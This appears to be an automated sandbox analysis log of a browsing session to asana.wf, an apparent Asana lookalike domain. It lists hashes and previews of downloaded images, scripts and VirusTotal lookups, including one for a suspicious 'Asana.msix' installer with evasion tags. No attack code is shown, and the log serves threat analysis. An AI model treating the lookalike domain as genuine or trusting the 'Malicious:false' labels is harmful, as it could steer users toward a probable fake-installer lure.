                                                                                                                                                                                                                    SSDEEP:384:D2PAI9kSLt3jkmfGmxLJwS6mfxiUsgxB79xz8PkXmCS7jtn/:D2PR9kSLB6MLH6mfxiUVxB79xz8LCS/t
                                                                                                                                                                                                                    MD5:96854A2B75FC4D55D63766748D832AF1
                                                                                                                                                                                                                    SHA1:669C6FEBC285C157EE6C01CF4F163ECD77AE460E
                                                                                                                                                                                                                    SHA-256:27F2158C80A69CF91F07A171F9A2BA3F82EE7690CAB4D03EAF13BBD540811188
                                                                                                                                                                                                                    SHA-512:DDE8EE1DFCED47EEA7DFA4F15DA9BAF796ABA4990873575B8CBBF77170133BA50B385FEA8105759517A9B769EDA1568E89A663189A3DB5B645DD612B19057CC3
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-goals-ui.webp
                                                                                                                                                                                                                    Preview:RIFF.Z..WEBPVP8X...........a..ALPH......"...?[....I;"..k....._...DM.l .F.g.i.........<.@...NDL.Cj...A...2.!.!..!..B.......y.""..W..uK.c.\...}qc$.E_...I..hD}n..Q.UZ6#..ht}..d|]/....Y..w..3.g.]...6.......v...].m...\y[1....?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?..................a.m.9Z;#..!...!...7 .....G....~.u.........j}JK2......eB.r=.Z.`.[.R3.r.......%?...VP8 .W..Po...*..b.>.H.L..?. .y....in.B...y...n......X.W.T~...P..:/...O>_0.h^...:.=.zc..3 |.............?.7...........Y+........C.7....y./.c.....?......_.1>..$..........W}.;W..@_]>...._....M.....3....._.........O...?...|..B.%.i.....O..M...........o.O._..v.......
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):276702
                                                                                                                                                                                                                    Entropy (8bit):7.997571545231762
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:6144:MUdV5FSBRRdYIzG8eyIcVh6ktwwtpm7/VAX4xJKt:/dLoRKIzG8qK6kaf7/VA+Kt
                                                                                                                                                                                                                    MD5:36FF18DC33B06657070E61D62AAB80F7
                                                                                                                                                                                                                    SHA1:782CC466A33C2F6F8FE0FF4D502D72438084315F
                                                                                                                                                                                                                    SHA-256:FA2343363FB45823C7BE41AC18A3BD6E2BF48D2EB9DD26C737EFE3157089D2B5
                                                                                                                                                                                                                    SHA-512:99089799A420445B7320F881B7AB44BE1FFB35235D42FE0B7F54C1317E010D0261DFA4678D1B3E8EE58E3A24F8B8E7A99ADA5EB85EDD26654D48E03C2C43A50F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/HOME24-web-hero-3x-en-US.webp
                                                                                                                                                                                                                    Preview:RIFF.8..WEBPVP8X...........*..ALPHD(....7n.I.,.w.......&. ......-....[..K...?.I.d....J..=.Z|..Q..(C...P..#....28..QJ..m....v.nX.-y..2Jb.F....?.e8xF...N...hX......j..J.T..J.!....<.Im.*.t.z...$I.$+c.3.#.;..W..]..!2k..a..P.$.v.......o...>....e.V..Ot..P...V........X....)......%.:...>.y^...........m..m.b.@.2P...&${.5..'.U...&ffV...'C...9...l..Z.}.9...y$"|1.dI.l[...2.UM.n..U.X{...8.....?....n..B.{D,N..|.X8..F7}.....N.,..O...<08-|R...|......<k.$.B#O.....s....*.b.....[......s g.B.Wp8..2....@.,...g.zD..(.$W{.......xz..|....K#O...y.i..'p.#.1...-...E..dO.vy.Ic...z:..;7....k.........~.....I..x.1......z-....&.4./...Qd..%y./.....>'..C.....<.>H..f.O.sy......]..,N.......m.].)..qi[.`Vx.c[Y.%.dB...O.S..k...o....<D5..g.!..!.<.*.D.S...4%..ga..8Z'.AP...a........d...v...".ny.J....U..>..g.2..bJ...<....=....] .<......^.........?.=_...<.w.~..~....CX...6q....'.0.&...[.*..1._.....).......2s....r..X..<..X..q.x.n..<krg.T........C1..?..Z...n{.x O.;.'....E.C..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 1641
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1043
                                                                                                                                                                                                                    Entropy (8bit):7.842879740287941
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:X/o6C6iINhd59B8m09QDT/cPiIcd7MbreH1F7n:XTimv9B0YIPhcdwXuNn
                                                                                                                                                                                                                    MD5:DA855A6A7F4E21F0B637A569BCC78DBB
                                                                                                                                                                                                                    SHA1:C7683FB7E0B12BA477AAED484056DCFC5C92C5E4
                                                                                                                                                                                                                    SHA-256:F6BAC614618C2C4EB0ABA150E57B48DBE692E125EE22ECFDC39B1B567C4EA338
                                                                                                                                                                                                                    SHA-512:2D7B30AD050E30F1BBECE892C098A8A28FAB9B465BB68CA14C38A66E4F2697BE8BB50679F0E44810865F72CEAE731178A2744ED5281D5E4F9CE13DEC12C3BD86
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/76703.305a02d74b372f34e459.js
                                                                                                                                                                                                                    Preview:..........|.ao.6....Wp.f....v.;R...V @....e..R.IfC..I)qm...d;..`.DIG.{.=.q@..2.AJ..2z.......O.....[!5......Eu.6..qq..g.p?<....5..,.,.t..,Y..K,.t1_^_.....j6g....j>.d..N.....\^N.K..^/..,U.......W....4.....M(C.....}F..Q...O.Q+T.].|.....|c5i.,..........%.[..."....S.7.).`].t........pa.f..H......7.[..F)....!....*......`..Wp...7....T.40Ch....`J..J.{G..,.....X.9~.....7..4.....I.x....S1.3j.B.f..u..U..3..~....dX0v88..L......NU.PJ..*O.B...my..s.^<........X".wB...Gw./N./._..Ps....k.~....(..F..??F.}0U....Q!]..[......].....'+=6..[.....p.5Y..%...c....#/.....;.u....S.~.R_19..g=.G.....-.!.u.v.....z..*..](.@..A.H..!.M..X.<.9:.@...Q.9/.....w..+D....8D.cT..T..K.1..{...%.2.SZ.'..LD...xH.....]z|XYm.gf<...oc..xI&.4.]Y..b..el.l..8s....qV...E!u.L....sm..ZnQ4.t..d.B.pN.F.......J+...a.~..?.E!....&.`.@gWq.../.E.......*F......M!.I<8.@p<_RR.:!.....z|P..%$G...8x.......Q.....;r. .....bP......xs.G.....X./x.F}i..{.X.....R....[g.....zb4P..n%<.l..,.xO..Q..].f.w..?..........|.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):3300
                                                                                                                                                                                                                    Entropy (8bit):3.9795724111380157
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:aVZbEJtlCuqP98NpC6MdQnnt4dNhQCKZwj2CXhKkEnNw4:yZb2lnqP9e7M44urdqOb
                                                                                                                                                                                                                    MD5:86CA4A377020BD3B5F95C4E78279C49C
                                                                                                                                                                                                                    SHA1:B85A4E402F3B0AA7CF5D4B2C367FAA51ADE0E343
                                                                                                                                                                                                                    SHA-256:668F84A4D7D56625C34819BEA27773DE3ABA3EEC880B0C06FDD9479205D6333F
                                                                                                                                                                                                                    SHA-512:48D512E5DA56142D88C96CC9574552C4150A2FE10BD6A6BC6D2057A7621857D13CBF71202CFF929E30FB7974A343CE6DDD2558FDAFF646BACF65AE700776F521
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/logo-ratio-40pxheight-McKesson.svg
                                                                                                                                                                                                                    Preview:<svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M37.6415 25.6978H27.7036V29.0726H37.6415V25.6978Z" fill="black"/>.<path d="M145 10.3773V29.0773H139.825C139.825 29.0773 133.552 17.9326 132.846 16.6933V29.0773H128.695V10.3773H134.076C134.076 10.3773 140.167 21.2169 140.854 22.4467V10.3773H145ZM18.1259 10.3773C18.1259 10.3773 14.821 20.7259 14.4798 21.8127C14.1292 20.7212 10.8477 10.3773 10.8477 10.3773H5V29.0773H9.05743V16.3072C9.71653 18.5142 12.8531 29.0773 12.8531 29.0773H15.9289C15.9289 29.0773 19.229 18.3902 19.8835 16.2595V29.0773H23.9596V10.3773H18.1259ZM72.0598 25.4545H62.9259V21.112H71.3025V17.4893H62.9259V14.0096H72.0598V10.3773H58.5085V29.0773H72.0598V25.4545ZM50.8798 10.3773C50.8798 10.3773 45.9763 16.6361 45.2705 17.4607V10.3773H41.1008V29.0773H45.2705V20.8213C46.0043 21.7412 51.0013 29.0773 51.0013 29.0773H56.8164C56.8164 29.0773 49.1269 19.3817 48.8464 19.0385C49.1316 18.7144 56.391 10.3726 56.391 10.3726H50.8798V1
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):2228
                                                                                                                                                                                                                    Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                    MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                    SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                    SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                    SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                                                                                    Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):23
                                                                                                                                                                                                                    Entropy (8bit):3.6211755429194716
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:YM0uRn:YM0uR
                                                                                                                                                                                                                    MD5:8183B9A40CF91DC91EE64E402122F07C
                                                                                                                                                                                                                    SHA1:3F2EAD7013B407FC83ECFDB34B2120003D88982A
                                                                                                                                                                                                                    SHA-256:B3849D6557B393391A2530A78375643A147278269DB19B8855798A1DEC085E53
                                                                                                                                                                                                                    SHA-512:2B2BD2D0F215820ED342BA8E6766EE2B97CC0CD215831FFC587F83A8E4D47AEA23DADF7C1EB6CF8388E6CF4FB77DFA82BDB06115B05437EFA4A94C2ADED08E77
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                    Preview:{"ip":"185.152.66.230"}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):15138
                                                                                                                                                                                                                    Entropy (8bit):7.988000013825199
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:7qqylX0L/rjxwJPLTlTnb8C9lZ7K1iiR8OvbgxFnE:eLuJwJPlbb8CAAiR8OvcTE
                                                                                                                                                                                                                    MD5:E9B23DAD17D599B9EF0E142EA3D22DFC
                                                                                                                                                                                                                    SHA1:4E2EA826B9954118149CF3F65A91CBAF05A72530
                                                                                                                                                                                                                    SHA-256:4F9D1D37C42686915C56798CCF70651913B78BC0301FF5DE08EEE9966F81A3A7
                                                                                                                                                                                                                    SHA-512:4B2B416FDF2C8BA25DF7690A85EA1F10DF22C9FA4E21A2F8991599ED4416C73B478EDB7DE1901DF2D354168318160F9227FD7F0EAF60147994990999CD44125C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/card-overstock-asana-customer.webp
                                                                                                                                                                                                                    Preview:RIFF.;..WEBPVP8 .;..pY...*0.u.>.@.K..".!..a...gn.7.u|J.|.w...b.*k>Y.....u.AW..v'..]....................4<g...P.._.b<'...1...{.c....-..R<..TrW..['.G;....e".....E..w...2*.".|U..........+W...N...pJ......R.B....i..Y.;2.l$..W...au.F..>..Sc..\sO-......K&..c0Hl.aI.*..]....\....y1j<.w.4..|...*..:..).\..XP...|....#.u...t.'.dF.F..f.$.yM.#p.X......r.-}..S.4.1.#...[..p.]L.V..j. ..@.aA9.0z .7..A.@b..D.}.|........I.....G.Ag_=.*lk.......L6.;i..p..O.u..MTEE.10..M+4".r}.........k=.}..........1.......[[....a.......v.\y..........sA....H.!........|...u?&..q....Z.:.a.$.....M."..YbLXp|E....RD...~...3.\......V....K./v.. .}+.tq.@..q....Q5. ^.|...x.d.z4..v.>.Y..1.........Us.4.!.....I......(p.......0{..zf......N,sr.J}^......f.....M"..3D...D.(..../..T...1f...j....T-.mY..:..<c.3.....I68niA..Il5.k..(I@.....)..w.T........T..x...(...8}...z7...!....|.....p......D...O.............m..}^..A....O.da.'.y".._.........W.....y.c.5t..P.4E..l....,(r..h.h...t...|..#.......Dj.x....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):52916
                                                                                                                                                                                                                    Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                    MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                    SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                    SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                    SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):15830
                                                                                                                                                                                                                    Entropy (8bit):7.976794931119543
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:zgw09IEWWo7tcWqX5re/9kfZK9oeKjF895KBvhr/:DmI6o7pUrbZsFUqOJj
                                                                                                                                                                                                                    MD5:57B54FF454DE0F8F5930F78C8AF2B4EF
                                                                                                                                                                                                                    SHA1:DF651E8BA9E2F1F57C29DA42B9423D4875E9C695
                                                                                                                                                                                                                    SHA-256:8EFC140BC3690CCBA1CCE304638BA2922D0676F78DF3F4939B456490B0471B9D
                                                                                                                                                                                                                    SHA-512:C81065F4A1A826B4B0DC78566499B1519F0B96E1194C4F9CBBE05E8CEB8030BB60E678A285B3D8D0C7F3FCA74DE4FC02B8213D36E451F48027C9CAD56881965C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.=..WEBPVP8X......../../..ALPH.......I..j$ a..)8`........p..........P{....{..m.[...q,.......p..x.}.......{H....1.?......{P.U..r..Y.V.....}..uK.m...?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?..?.G.L...........CZ.Z..V.d.RUkR...6sb...9...%%........g>.^..H.....H.u..m..<...j/.VP8 .;..pw...*0.0.>.F.L%.."!R)....in.|..k.9.._3...Z.......'=.......w...@../D...._).}...E..........'..........$}z..................|..w......?..k....?.z......_.....z_...W.?`.......;.....=.?........._...?..n.....o..!..............G...........lG....I....N..2......F.<)...*..Z.{..m....`!.a.|......iwD:...!..!3.>_....H.=7....z.[..l...}.....].....u'Wm.6.."U..,.v.J..).......~.j.o...S.W.fV...iwD.,?.x..4..Xio...........!t....^W..f..DL..Dt.>..>.;.(?...\..<)...c.|....V.:......2.]..1....l.#zF$..u'RY-[VN.u$...r7l.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):229
                                                                                                                                                                                                                    Entropy (8bit):4.8961178536674606
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:3RsJwouzsY6A++sdLA23MA7DQ6bIrSQnDIQCfym2V/mFlbAn:K+F2AwrDDerSnQCuV/mTbA
                                                                                                                                                                                                                    MD5:820189D8E5BA01BE1DADC849C631C2CA
                                                                                                                                                                                                                    SHA1:BB2D68F5EDD72786D5975DC8FE1AC6EA39623B27
                                                                                                                                                                                                                    SHA-256:FA99CCE6F43226F76B57F272250FF7C3F2A08CE666FA71204797BFEB5032C066
                                                                                                                                                                                                                    SHA-512:26577692264AD83A4D6DD5880941DD5F7F55943D8F9E3A097FB263B0FC00948BB4E5DF95D832F0F3EEAC7A1D3842ACFE56472EBAC80667D4F01199B0C027ACC7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children
                                                                                                                                                                                                                    Preview:{. "data": [],. "meta": {. "count": 0. },. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children?limit=10". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):35834
                                                                                                                                                                                                                    Entropy (8bit):3.7983318089153704
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:MFzy4PDoMEgx8HrNsyh0xNEev/tKXrCJbOkrOp7uagyWuXi7W7hvvtWpbb+b60s3:qyGnxOaUOuy2R0bB0Bw
                                                                                                                                                                                                                    MD5:00015F0557607E69702564D42DC8F9D3
                                                                                                                                                                                                                    SHA1:3DEF6DD46BE58071270870712B90EF828E67F6EA
                                                                                                                                                                                                                    SHA-256:F948989F9320A6D4EAE6AB1D04C98D8A9F8ACDFCB3B53F7E3F6F28776BEB9977
                                                                                                                                                                                                                    SHA-512:474F9F28421B7FE7B751F4DC8C3F7AAB26A206EBFC6AC0F2855D1ADD88C9B5C28678E88BCE29E23575A94ECCC1502F68102030F25DDB208B22A4FAB36AEA29D6
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358
                                                                                                                                                                                                                    Preview:{. "data": {. "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358",. "type": "file",. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358". },. "attributes": {. "crowdsourced_ids_stats": {. "high": 1,. "medium": 0,. "low": 3,. "info": 1. },. "unique_sources": 4,. "sha256": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358",. "meaningful_name": "Asana.msix",. "tags": [. "zip",. "long-sleeps",. "contains-pe",. "detect-debug-environment",. "checks-user-input". ],. "last_analysis_results": {. "Elastic": {. "method": "blacklist",. "engine_name": "Elastic",.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3484
                                                                                                                                                                                                                    Entropy (8bit):7.770021974049758
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:RBmn15J0qHXp6Ss5XcftlLkfoB7tSj1YBkjw/+YYKxuQhZx:G1UqHXp6SttlaBjI0izrPhT
                                                                                                                                                                                                                    MD5:D3BA22E3EF1AE9DE5E758F396EB64208
                                                                                                                                                                                                                    SHA1:127376C707EE7A6D255E05BE6DAD5BE3870FB5D7
                                                                                                                                                                                                                    SHA-256:12E56D63E493B58A98CBB219094155CB3FF5DF767FE56C9D2500742EF0B55F81
                                                                                                                                                                                                                    SHA-512:E9E985FBCCA4FBCFCC29523A39E8DA9A8782435D0433219B111B1272C6F5AA57B9B2384915B5A0A31BE2FF92599475697288C4A9DB2E23C2FCE2878E8609DFCA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X......../.....ALPH.....g` ..O`........N.m.'.f.....b....I;uB...>WQ...O...U0.0...W..uLR.=.r..V......S..)....=.....+..............?............?............?............?............?............?.......H.t.....GW..]...".wOL..'*R.........:o..0.J.VP8 .........*0. .>.H.L..." ..`...in.wZ..0.-%w..........'..../b|..}.*.?3.q.....q.-...s...}...u....H.E.J1.../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi...f...k.3F.y.....o..}..<.q...7.[.....WY...M]fU...../....]/i.5u.x.4..e..'.x.4..e.l]+...../..{..(1.../..-..u.x.4..e...p...4..e....t../.....^........^.....e...WY...=.Wq..>b..O=..R}.e.g.]..lw.y..~.d./.....^.`30...s............jm..8&..".X/.L{R.7....\.q9G...W.6..[&...,0.`..S....I...Mm...Z...cJ1.../......Z. .....8yn..X......s..AwY.._T><..,.a......`..'k.....f..%.uC5C.pI]t..4..e...WY..~.p+.?%..... j....ia.J..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):271
                                                                                                                                                                                                                    Entropy (8bit):5.200151437333414
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRCwD8oD:J0+oxBeRmR9etdzRxGezHtD8+
                                                                                                                                                                                                                    MD5:7529B4E4DFCFB10C1625B4F4BD419695
                                                                                                                                                                                                                    SHA1:5CB606E5B750EE230060599BEF510F620FCF4973
                                                                                                                                                                                                                    SHA-256:B9E32F4A9713339790E37FBF490FC2EE63CA93D8F0454767B398DA4E57333C00
                                                                                                                                                                                                                    SHA-512:95DE2955B3D4F6D23031E99390254A22CCC6BC17F4691078A2F12AC5C11A54D3619E53784759C8E5ED2276554E154FF0FFB1515C5A0BBC62B86FC9ABD2C69E17
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/logo-ratio-40pxheight-Johnson-Johnson.svg
                                                                                                                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at asana.wf Port 443</address>.</body></html>.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):15138
                                                                                                                                                                                                                    Entropy (8bit):7.988000013825199
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:7qqylX0L/rjxwJPLTlTnb8C9lZ7K1iiR8OvbgxFnE:eLuJwJPlbb8CAAiR8OvcTE
                                                                                                                                                                                                                    MD5:E9B23DAD17D599B9EF0E142EA3D22DFC
                                                                                                                                                                                                                    SHA1:4E2EA826B9954118149CF3F65A91CBAF05A72530
                                                                                                                                                                                                                    SHA-256:4F9D1D37C42686915C56798CCF70651913B78BC0301FF5DE08EEE9966F81A3A7
                                                                                                                                                                                                                    SHA-512:4B2B416FDF2C8BA25DF7690A85EA1F10DF22C9FA4E21A2F8991599ED4416C73B478EDB7DE1901DF2D354168318160F9227FD7F0EAF60147994990999CD44125C
